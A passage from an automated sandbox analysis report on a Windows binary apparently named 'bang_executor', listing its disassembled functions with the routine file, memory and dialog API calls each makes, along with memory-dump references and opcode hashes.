                                        • Opcode ID: 91a75622b4bdbfa87e5186d00677a8fe924d6d27de89b900df4a7ff15ba667e3
                                        • Instruction ID: 432899cbcc7f0968c79e7be3ac8101e936f0e04cb707eec90aca30af5c403aa4
                                        • Opcode Fuzzy Hash: 91a75622b4bdbfa87e5186d00677a8fe924d6d27de89b900df4a7ff15ba667e3
                                        • Instruction Fuzzy Hash: EEA002D679D502FC711551959D16D7E0A5CF5C4B55B30AD19F445C40C1584118455131
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0050E240 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0050DE0B: GetOEMCP.KERNEL32(00000000,?,?,0050E094,?), ref: 0050DE36
                                        • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0050E0D9,?,00000000), ref: 0050E2B4
                                        • GetCPInfo.KERNEL32(00000000,0050E0D9,?,?,?,0050E0D9,?,00000000), ref: 0050E2C7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: CodeInfoPageValid
                                        • String ID:
                                        • API String ID: 546120528-0
                                        • Opcode ID: 0cb5ddf897b96de79897524fa298f0fca5f1ff1b4ddf9caf423abe80cd83c065
                                        • Instruction ID: baad3aaf05c027158f8f80b4cd2435d5c3a47fe08a47db23a4cf97e16a3bda7b
                                        • Opcode Fuzzy Hash: 0cb5ddf897b96de79897524fa298f0fca5f1ff1b4ddf9caf423abe80cd83c065
                                        • Instruction Fuzzy Hash: 8651E2709002069EDB258F75C8866FEBFE5FF41300F288CAED4968B1D1D635A985CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004EB45F Relevance: 3.1, APIs: 2, Instructions: 140COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetFilePointer.KERNELBASE(000000FF,?,00000800,?,?,00000000,?,?,004EB43B,00000800,00000800,00000000,?,?,004EA31D,?), ref: 004EB5EB
                                        • GetLastError.KERNEL32(?,?,004EA31D,?,?,?,?,?,?,?,?), ref: 004EB5FA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ErrorFileLastPointer
                                        • String ID:
                                        • API String ID: 2976181284-0
                                        • Opcode ID: 45059036fc8525122dd56d6cf3309d64ce81b696f4b5d6820d16ed6644d334dc
                                        • Instruction ID: 1ccc491e53dca50986c1585e5505126d98fdcf74151601e2438bf82d4aac34cd
                                        • Opcode Fuzzy Hash: 45059036fc8525122dd56d6cf3309d64ce81b696f4b5d6820d16ed6644d334dc
                                        • Instruction Fuzzy Hash: 2841D4312043C1ABD7209F66D9849BB73E5FF58326F10462FE54583381D7B8D8858BDA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004EB01E Relevance: 3.1, APIs: 2, Instructions: 89fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNELBASE(?,?,00000000,00000000,00000002,00000000,00000000,?,00000000,?,?,?,004EB967,?,?,004E87FD), ref: 004EB0A4
                                        • CreateFileW.KERNEL32(?,?,00000000,00000000,00000002,00000000,00000000,?,?,00000800,?,?,004EB967,?,?,004E87FD), ref: 004EB0D4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: a6fb189dc8fed9ed2bce291188a9faf46d6b32807603041b176093d3562e9634
                                        • Instruction ID: ff1de08daa8bce525411fde1fe028b26fddf507e961d957804cfab93e5145da0
                                        • Opcode Fuzzy Hash: a6fb189dc8fed9ed2bce291188a9faf46d6b32807603041b176093d3562e9634
                                        • Instruction Fuzzy Hash: 1221B1715043846FE3308B26CC89BB7B7DCEB88315F004A1EF9A5C22D1D778B84486A6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004EB7E2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FlushFileBuffers.KERNEL32(?), ref: 004EB7FC
                                        • SetFileTime.KERNELBASE(?,?,?,?), ref: 004EB8B0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: File$BuffersFlushTime
                                        • String ID:
                                        • API String ID: 1392018926-0
                                        • Opcode ID: e81f249f2938f722a9cca8ba1cdaa24f9ce61b4cb77d6652cc4b8f3ae3b7e3b2
                                        • Instruction ID: 239e17d1e01030b6f06da74b536c40bf8917fcfb397a6a0de7c347e50e2e625e
                                        • Opcode Fuzzy Hash: e81f249f2938f722a9cca8ba1cdaa24f9ce61b4cb77d6652cc4b8f3ae3b7e3b2
                                        • Instruction Fuzzy Hash: F421DF312482859BC714EE26C491ABBBBE8BF55306F08491EF48187381D32DD90CD7A6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004E1FB0 Relevance: 3.1, APIs: 2, Instructions: 69COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: H_prolog3_wcslen
                                        • String ID:
                                        • API String ID: 3746244732-0
                                        • Opcode ID: d9147fbcbd9d49a42f6c9c9e63224d3d955eb969157f084fe0252baa3e405204
                                        • Instruction ID: f41a86593372ae38fa9d8460fe19f879f1f835fc866028043408db885a494efe
                                        • Opcode Fuzzy Hash: d9147fbcbd9d49a42f6c9c9e63224d3d955eb969157f084fe0252baa3e405204
                                        • Instruction Fuzzy Hash: EB21AC3590024A9FCF11EF96C885AEEBBB6BF48304F10042EF545A72E2C7795A51CF68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00506192 Relevance: 3.1, APIs: 2, Instructions: 67libraryloaderCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • FreeLibrary.KERNEL32(00000000,00000001,005460C8,?,?,?,00506386,00000004,InitializeCriticalSectionEx,00519624,InitializeCriticalSectionEx,00000000,?,0050613D,005460C8,00000FA0), ref: 00506215
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0050621F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AddressFreeLibraryProc
                                        • String ID:
                                        • API String ID: 3013587201-0
                                        • Opcode ID: eb9d30748c36622d55b1875742e5a97731f0a18ca99a194a579f9a966d302fc6
                                        • Instruction ID: 743c1c85710a39fdcb2e9de785c0aaf5d751ddd8c84c3c60ef41927eecef3a2f
                                        • Opcode Fuzzy Hash: eb9d30748c36622d55b1875742e5a97731f0a18ca99a194a579f9a966d302fc6
                                        • Instruction Fuzzy Hash: 1C11D0396001169FDF22CFA4DC8099E7BA5FF563607240169E916EB291E730ED21DB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004FCF89 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004EE208: _wcslen.LIBCMT ref: 004EE210
                                          • Part of subcall function 004F418A: _wcslen.LIBCMT ref: 004F4192
                                          • Part of subcall function 004F418A: _wcslen.LIBCMT ref: 004F41A3
                                          • Part of subcall function 004F418A: _wcslen.LIBCMT ref: 004F41B3
                                          • Part of subcall function 004F418A: _wcslen.LIBCMT ref: 004F41C1
                                          • Part of subcall function 004F418A: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,004ED2D3,?,?,00000000,?,?,?), ref: 004F41DC
                                          • Part of subcall function 004FCBB6: SetCurrentDirectoryW.KERNELBASE(?), ref: 004FCBBA
                                        • _wcslen.LIBCMT ref: 004FCFF1
                                        • SHFileOperationW.SHELL32(?), ref: 004FD033
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: _wcslen$CompareCurrentDirectoryFileOperationString
                                        • String ID:
                                        • API String ID: 1016385243-0
                                        • Opcode ID: cc7e6480c98f8b9063c9a0af0096405d304e5b42680d8829c4153add76629a23
                                        • Instruction ID: 6b46bd87d7daa977deae5c32895cbcbbc0bfd89156347747f94d15eca55ba2fb
                                        • Opcode Fuzzy Hash: cc7e6480c98f8b9063c9a0af0096405d304e5b42680d8829c4153add76629a23
                                        • Instruction Fuzzy Hash: 8B11B27190021D6ADB24AFA4DC4EBEE77ACFF58344F14082AF605D71C1EBB896488B05
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004EB8C0 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 004EB907
                                        • GetLastError.KERNEL32 ref: 004EB914
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ErrorFileLastPointer
                                        • String ID:
                                        • API String ID: 2976181284-0
                                        • Opcode ID: 44f12190099512abf143b14a19d302239ad3004583fa524e59626ea5aedebaf9
                                        • Instruction ID: f457b6f330a37ed363275d9d2e596a2ae51f08a38f3fca3248b04df7d6411075
                                        • Opcode Fuzzy Hash: 44f12190099512abf143b14a19d302239ad3004583fa524e59626ea5aedebaf9
                                        • Instruction Fuzzy Hash: 93110270A00740ABD724972ACC847A773E8FB45372F60462AE252932D1E378EC05D794
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0050BB34 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 0050BB55
                                          • Part of subcall function 0050BC8E: RtlAllocateHeap.NTDLL(00000000,?,?,?,00506A24,?,0000015D,?,?,?,?,00507F00,000000FF,00000000,?,?), ref: 0050BCC0
                                        • HeapReAlloc.KERNEL32(00000000,?,?,?,?,005250C4,004E190A,?,?,00000007,?,?,?,004E1476,?,00000000), ref: 0050BB91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Heap$AllocAllocate_free
                                        • String ID:
                                        • API String ID: 2447670028-0
                                        • Opcode ID: f057022c4b62a4fb5c4149dfc55bc3c37c571126656bab8b576b42c31e59840f
                                        • Instruction ID: 0de1dd702c30e5d7b4428420dc979f056fdd85103cddf364ef8e1f193930b31a
                                        • Opcode Fuzzy Hash: f057022c4b62a4fb5c4149dfc55bc3c37c571126656bab8b576b42c31e59840f
                                        • Instruction Fuzzy Hash: 67F0F631600207A7FB212A66ACC5FAF3F58FFC2B70B204126F815961E5DF34CC0191A9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004EC2E5 Relevance: 3.0, APIs: 2, Instructions: 38COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetFileAttributesW.KERNELBASE(?,00000000,?,00000001,?,004EBF5E,?,?), ref: 004EC305
                                          • Part of subcall function 004EDA1E: _wcslen.LIBCMT ref: 004EDA59
                                        • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,004EBF5E,?,?), ref: 004EC334
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AttributesFile$_wcslen
                                        • String ID:
                                        • API String ID: 2673547680-0
                                        • Opcode ID: 57d1219e03f909ad58ff9ea3141e124c216d3354b0594c5998be55d74620b01d
                                        • Instruction ID: f76004d00dfbcfd0c90016a8e1b7fe39f2f9cb637bb920f616ae84e28536fa17
                                        • Opcode Fuzzy Hash: 57d1219e03f909ad58ff9ea3141e124c216d3354b0594c5998be55d74620b01d
                                        • Instruction Fuzzy Hash: 57F0F034200219ABDB00AF328C05AEF77ACFF0C305F40809AB901D7290DB34DE499BA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004EBC65 Relevance: 3.0, APIs: 2, Instructions: 36fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • DeleteFileW.KERNELBASE(?,?,?,?,004EB14B,?,00000000,004EAF6E,08ADEBCE,00000000,0051517A,000000FF,?,004E8882,?,?), ref: 004EBC82
                                          • Part of subcall function 004EDA1E: _wcslen.LIBCMT ref: 004EDA59
                                        • DeleteFileW.KERNEL32(?,?,?,00000800,?,004EB14B,?,00000000,004EAF6E,08ADEBCE,00000000,0051517A,000000FF,?,004E8882,?), ref: 004EBCAE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: DeleteFile$_wcslen
                                        • String ID:
                                        • API String ID: 2643169976-0
                                        • Opcode ID: 48765689010a3c7d7224015917a498a8c0471b2bdf856d22a1d1fcb14b31043d
                                        • Instruction ID: 0213155fba6527a739e9206f6ed2389e2628ea16f1e8b36776059167fca7166e
                                        • Opcode Fuzzy Hash: 48765689010a3c7d7224015917a498a8c0471b2bdf856d22a1d1fcb14b31043d
                                        • Instruction Fuzzy Hash: 0CF0BE35601229ABDB00DF619C45EEF77ACEF0D305F44406ABA01D3280DF74EE889BA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0050030B Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                        Download Yara Rule
                                        APIs
                                        • _swprintf.LIBCMT ref: 00500341
                                          • Part of subcall function 004E4C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004E4C13
                                        • SetDlgItemTextW.USER32(00000065,?), ref: 00500358
                                          • Part of subcall function 004FD864: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 004FD875
                                          • Part of subcall function 004FD864: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004FD886
                                          • Part of subcall function 004FD864: IsDialogMessageW.USER32(0001045C,?), ref: 004FD89A
                                          • Part of subcall function 004FD864: TranslateMessage.USER32(?), ref: 004FD8A8
                                          • Part of subcall function 004FD864: DispatchMessageW.USER32(?), ref: 004FD8B2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                        • String ID:
                                        • API String ID: 2718869927-0
                                        • Opcode ID: aad4e8a0b43cb0a627b6cf3d57ef85305d8a4ea728db535f1ae4bfbd43c8d3e9
                                        • Instruction ID: f2e7dc47da5da70ae9ff53c9018d7defebe31860cde013c47d255f7d62cb2031
                                        • Opcode Fuzzy Hash: aad4e8a0b43cb0a627b6cf3d57ef85305d8a4ea728db535f1ae4bfbd43c8d3e9
                                        • Instruction Fuzzy Hash: 08F0BB7150020C6BDB11FB6ADC0AEEF7BAC9F0D309F040456B20197193D6749A059BA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004EBCDD Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(?,?,?,?,004EBCD4,?,004E8607,?), ref: 004EBCFA
                                          • Part of subcall function 004EDA1E: _wcslen.LIBCMT ref: 004EDA59
                                        • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,?,?,004EBCD4,?,004E8607,?), ref: 004EBD24
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AttributesFile$_wcslen
                                        • String ID:
                                        • API String ID: 2673547680-0
                                        • Opcode ID: 4840ab12286d33263f4e21cd6b7de4d09dec521c5f2b159b1e7efefd4e9ac74e
                                        • Instruction ID: d6e7a8e92aa2014c5d6a11ea5ed186467e85cce70ddc37c41c85a0266def2a84
                                        • Opcode Fuzzy Hash: 4840ab12286d33263f4e21cd6b7de4d09dec521c5f2b159b1e7efefd4e9ac74e
                                        • Instruction Fuzzy Hash: 7EF0B4316002585BD710EB799D099EFB7BCEB4D761F000165FA41E3280DB749E45DA99
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004F3184 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcess.KERNEL32(?,?,00000002,00000002,?,004F31C7,004ED526), ref: 004F3191
